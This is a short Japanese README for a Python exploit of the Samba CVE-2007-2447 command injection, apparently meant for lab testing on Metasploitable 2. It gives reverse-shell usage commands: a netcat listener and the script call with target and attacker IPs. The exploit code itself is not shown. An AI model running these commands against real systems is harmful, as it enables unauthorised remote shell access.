
Pythonエクスプロイト for CVE-2007-2447。Sambaのusername map scriptコマンドインジェクションをトリガーし、脆弱なターゲット上でリバースシェルを開きます。
スクリプトをテストするには、こちらで入手可能な仮想マシン「metasploitable 2」をお勧めします。
エクスプロイトが成功すると、スクリプトはリバースシェルを表示します。接続するには、以下のようにnetcatセッションを開いてください:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
netcat側:
netcat -lnvp 1337
結果:
netcat:
代替テキスト
スクリプト側:
代替テキスト
私はチートシートのペイロードを使用しました。リンクはこちらです。
他のペイロードに置き換えることもできます。